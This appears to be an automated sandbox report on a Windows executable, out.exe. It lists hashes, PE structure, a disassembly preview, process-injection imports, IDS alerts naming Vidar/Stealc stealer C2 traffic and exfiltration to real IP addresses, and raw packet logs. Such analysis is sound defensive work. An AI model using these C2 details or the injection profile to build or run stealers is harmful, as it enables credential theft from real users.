                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:fvv3:/
                                                                                                                                                                                        MD5:6FD5E726D086DC29B56D6449B0CBEB7F
                                                                                                                                                                                        SHA1:0E0B1F8292D2E96C2E9D843B95FCD545F15E2C22
                                                                                                                                                                                        SHA-256:6FD0EF87E4CFE63EAFEE1DC4200C58D0AFD5141C15D472B11620AE626169EE49
                                                                                                                                                                                        SHA-512:51D877FC08DF84DBB658920B82150BC884492BFC8A16D50E6A96E1FF3294E2B39CA099F01D02158F37F24E9E4755FAB37B3F09E215F7906B74FA418E048AEF50
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):6.485330799031038
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:out.exe
                                                                                                                                                                                        File size:393'216 bytes
                                                                                                                                                                                        MD5:7a2f8827805aba605ac201a9f0c2cb03
                                                                                                                                                                                        SHA1:f1e15c229cf82f17d5f98cc6ad29247446bf54ca
                                                                                                                                                                                        SHA256:0781a4d72a9f35f27a6608e0e5ec8afbf3ee1e39c656b6e5f0582b60d34fa018
                                                                                                                                                                                        SHA512:c54a99231089c97d58919faa59c2a5d9a64c39a5b0b3ccda0924de43837f65c7cfda81a3d4008c29b9fc0754d7dd9608a6098d1b8419bba4e3db1f0c0e693b61
                                                                                                                                                                                        SSDEEP:6144:elqPvKpKJNJGyRlyIf8aSp0Vbux0R4kF/Y/o8+:emRJNMalyIkaO0Ix6BY/s
                                                                                                                                                                                        TLSH:A6848D1623A030F7E2234575BA454322CBA7B8341661F75FABC405699FFA6C1EE2C71B
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?d.]^..]^..]^..2(..E^..2(..R^..2(..b^..T&..X^..T&..M^...'..^^..]^...^..2(..M^..2(..\^..Rich]^..........................PE..L..

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x4184ae
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x66FB184E [Mon Sep 30 21:29:50 2024 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                        Import Hash:118187c3a5a9d853faf932e2bfb655fe

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        je 00007F013CF0E215h
                                                                                                                                                                                        jne 00007F013CF0E213h
                                                                                                                                                                                        mov eax, FEA6B0E8h
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax+000181E8h], edi
                                                                                                                                                                                        add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                                        add dword ptr [eax-0173DB18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01725118h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01725B18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01726518h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01706918h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01727918h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01728318h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01728D18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01707918h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172A118h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172AB18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172B518h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01704A18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172C918h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172D318h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172DD18h], edi
                                                                                                                                                                                        jmp far eax
                                                                                                                                                                                        call dword ptr [eax+0374FFFEh]
                                                                                                                                                                                        jne 00007F013CF0E213h
                                                                                                                                                                                        mov eax, FE8D13E8h
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax+00000000h], edi

                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                        • [C++] VS2010 build 30319
                                                                                                                                                                                        • [ASM] VS2010 build 30319
                                                                                                                                                                                        • [ C ] VS2010 build 30319
                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                        • [LNK] VS2010 build 30319

                                                                                                                                                                                        Data Directories

                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3bb800xc8.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2700000xb0.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2710000x3340.reloc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x300000x290.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                        Sections

                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        .text0x10000x2e2b40x2e4005e1e159009c41d9f233e2d4596ec701bFalse0.5120988175675676Matlab v4 mat-file (little endian) , numeric, rows 4387467, columns 43874806.455831500975683IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .rdata0x300000xc99e0xca002dd74f69da060d7decb221b246bc98caFalse0.6049659653465347data6.367441015660518IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .data0x3d0000x23226c0x202001217b4eb11dab4db3583f64f37447efaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .rsrc0x2700000xb00x2004b7115c48fa1ed45d7fd2da2c2df5abbFalse0.279296875data4.097217764488071IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .reloc0x2710000x49b20x4a0074336b5e1e990d510dead9e0bdbdad32False0.5687816722972973data5.49190569334322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                        Resources

                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                        RT_MANIFEST0x2700580x56ASCII text, with CRLF line terminatorsEnglishUnited States1.0232558139534884

                                                                                                                                                                                        Imports

                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        msvcrt.dllstrncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, memchr, strcpy_s, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, memmove, __CxxFrameHandler3
                                                                                                                                                                                        KERNEL32.dllGetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, FreeLibrary, GetThreadContext, SetThreadContext, ReadProcessMemory, SetHandleCount, WriteProcessMemory, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, GetLogicalDriveStringsA, CreateThread, CreateFileA, GetFileSize, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, GetCPInfo, HeapSetInformation, GetCommandLineA, HeapReAlloc, GetLocaleInfoW, LoadLibraryW, InterlockedExchange, SetConsoleCtrlHandler, IsProcessorFeaturePresent, GetCurrentThread, InterlockedDecrement, GetACP, GetCurrentThreadId, SetLastError, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, VirtualAllocEx, GetStringTypeW, InterlockedIncrement, TlsFree, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, TlsSetValue, TlsGetValue, TlsAlloc, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, RtlUnwind, HeapCreate
                                                                                                                                                                                        USER32.dllGetDesktopWindow, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, GetCursorPos, SetThreadDesktop, RegisterClassW, IsWindowVisible, CharToOemA
                                                                                                                                                                                        GDI32.dllCreateDCA, GetDeviceCaps
                                                                                                                                                                                        ADVAPI32.dllRegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
                                                                                                                                                                                        SHELL32.dllSHFileOperationA
                                                                                                                                                                                        ole32.dllCoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
                                                                                                                                                                                        OLEAUT32.dllSysAllocString, SysFreeString, VariantClear, VariantInit
                                                                                                                                                                                        SHLWAPI.dll

                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                        2024-10-07T20:35:21.007155+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54975249.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:22.166238+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54976349.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:23.734166+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54977449.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:24.405392+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.54977449.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:25.030726+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54978249.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:25.704302+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.106.214443192.168.2.549782TCP
                                                                                                                                                                                        2024-10-07T20:35:26.384044+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54979149.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:27.078262+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.106.214443192.168.2.549791TCP
                                                                                                                                                                                        2024-10-07T20:35:27.795548+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54980249.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:28.802525+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54981049.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:31.697871+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54983149.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:32.861245+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54983949.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:34.359756+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54985149.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:35.854422+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54986049.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:37.780067+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54987549.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:39.358579+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54988749.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:41.113143+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54989949.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:43.163643+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54991349.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:44.613860+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54992449.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:47.991700+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54994649.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:49.382271+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54995349.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:50.698257+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54996349.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:52.212160+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54997449.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:54.353536+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54998849.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:56.383056+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54999849.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:57.702528+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54999949.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:59.176328+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.55000045.132.206.25180TCP

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Oct 7, 2024 20:35:18.376065016 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:18.376094103 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:18.376182079 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:18.393054962 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:18.393069983 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:19.006836891 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:19.006932974 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:19.057044983 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:19.057066917 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:19.057964087 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:19.058044910 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:19.060475111 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:19.107404947 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:19.989917040 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:19.989970922 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:19.990010977 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:19.990143061 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:19.990143061 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:19.990175962 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:19.990266085 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.076598883 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:20.076664925 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:20.076694965 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.076729059 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:20.076757908 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.076770067 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.081422091 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:20.081507921 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086213112 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086287022 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086293936 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086340904 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086375952 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086438894 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086493969 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086508036 CEST44349736104.102.49.254192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086519957 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.086561918 CEST49736443192.168.2.5104.102.49.254
                                                                                                                                                                                        Oct 7, 2024 20:35:20.162544966 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:20.162578106 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:20.162776947 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:20.162951946 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:20.162966967 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.007015944 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.007154942 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.010576010 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.010586977 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.010994911 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.011100054 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.011442900 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.059401989 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.482206106 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.482294083 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.482316017 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.482414007 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.482439041 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.482506990 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.484699011 CEST49752443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.484715939 CEST4434975249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.506730080 CEST49763443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.506822109 CEST4434976349.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:21.506901979 CEST49763443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.507077932 CEST49763443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:21.507112026 CEST4434976349.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:22.166142941 CEST4434976349.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:22.166238070 CEST49763443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:22.166856050 CEST49763443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:22.166882992 CEST4434976349.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:22.168529987 CEST49763443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:22.168543100 CEST4434976349.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:23.078407049 CEST4434976349.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:23.078587055 CEST4434976349.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:23.078655005 CEST49763443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:23.078707933 CEST49763443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:23.078875065 CEST49763443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:23.078910112 CEST4434976349.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:23.088697910 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:23.088723898 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:23.089210033 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:23.089359999 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:23.089371920 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:23.734005928 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:23.734165907 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:23.734522104 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:23.734524965 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:23.735945940 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:23.735950947 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:24.405446053 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:24.405478954 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:24.405524969 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:24.405535936 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:24.405585051 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:24.405585051 CEST49774443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:24.405591965 CEST4434977449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:24.405664921 CEST49774443192.168.2.549.12.106.214
